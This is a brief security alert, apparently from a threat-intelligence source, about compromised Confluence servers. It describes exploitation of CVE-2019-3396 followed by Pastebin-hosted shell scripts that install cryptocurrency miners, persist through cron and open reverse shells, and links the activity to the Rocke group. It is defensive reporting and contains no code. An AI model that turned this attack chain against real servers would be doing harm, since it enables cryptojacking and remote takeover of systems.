VERY IMPORTANT

Users have reported numerous compromised Confluence instances, mostly occuring on April 10th. The installation methodology seems to be the crypto-jacking standard of exploitation (CVE-2019-3396), followed by running shell scripts from Pastebin. These scripts then install crypto-currency miners and persist via cron. Victims have reported manual interaction enabled by reverse-shells via Pastebin scripts, placed in cron-tab to run. There are links in infrastructure between many of these attacks and an earlier report on the Rocke group by Anomali.